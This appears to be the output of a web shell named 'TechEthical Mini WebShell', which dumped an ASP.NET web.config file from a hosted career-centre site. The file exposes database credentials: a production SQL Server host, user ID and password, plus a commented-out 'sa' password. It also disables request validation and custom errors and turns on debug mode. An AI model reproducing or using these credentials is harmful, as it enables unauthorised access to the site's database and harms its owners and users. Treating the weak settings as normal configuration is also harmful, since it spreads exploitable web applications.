TechEthical CEHP
<?xml version="1.0" encoding="utf-8"?>
<!--
For more information on how to configure your ASP.NET application, please visit
http://go.microsoft.com/fwlink/?LinkId=169433
-->
<configuration>
<appSettings>
<add key="ValidationSettings:UnobtrusiveValidationMode" value="None" />
</appSettings>
<!-- <connectionStrings>
<add name="conn_ConnectionString" connectionString="Data Source=DELL-PC\sqlexpress;Initial Catalog=Bathua_Kirshna_directory;User ID=sa;Password=987456321"
providerName="System.Data.SqlClient" />
</connectionStrings>
-->
<connectionStrings>
<add name="conn_ConnectionString" connectionString="Data Source=SG2NWPLS19SQL-v09.mssql.shr.prod.sin2.secureserver.net,1433; Initial Catalog=Bathua_CareerCentre; User ID=Bathua_CareerCentre; Password=1tt5Y^k3; Max Pool Size=5000;" providerName="System.Data.SqlClient" />
</connectionStrings>
<system.web>
<pages validateRequest="false" />
<customErrors mode="Off">
</customErrors>
<compilation debug="true" targetFramework="4.5" tempDirectory="G:\PleskVhosts\megamind.net.in\tmp" />
<httpRuntime targetFramework="4.5" maxRequestLength="1048576" />
</system.web>
<system.webServer>
<security>
<requestFiltering>
<requestLimits maxAllowedContentLength="1073741824" />
</requestFiltering>
</security>
<rewrite>
<rules>
<rule name="RemoveASPX" enabled="true" stopProcessing="true">
<match url="(.*)\.aspx" />
<action type="Redirect" url="{R:1}" />
</rule>
<rule name="AddASPX" enabled="true">
<match url=".*" negate="false" />
<conditions>
<add input="{REQUEST_FILENAME}" matchType="IsFile" negate="true" />
<add input="{REQUEST_FILENAME}" matchType="IsDirectory" negate="true" />
<add input="{URL}" pattern="(.)\.(.)" negate="true" />
</conditions>
<action type="Rewrite" url="{R:0}.aspx" />
</rule>
</rules>
</rewrite>
</system.webServer>
</configuration>
TechEthical Mini WebShell Version 1.0, Coded By The_M@T3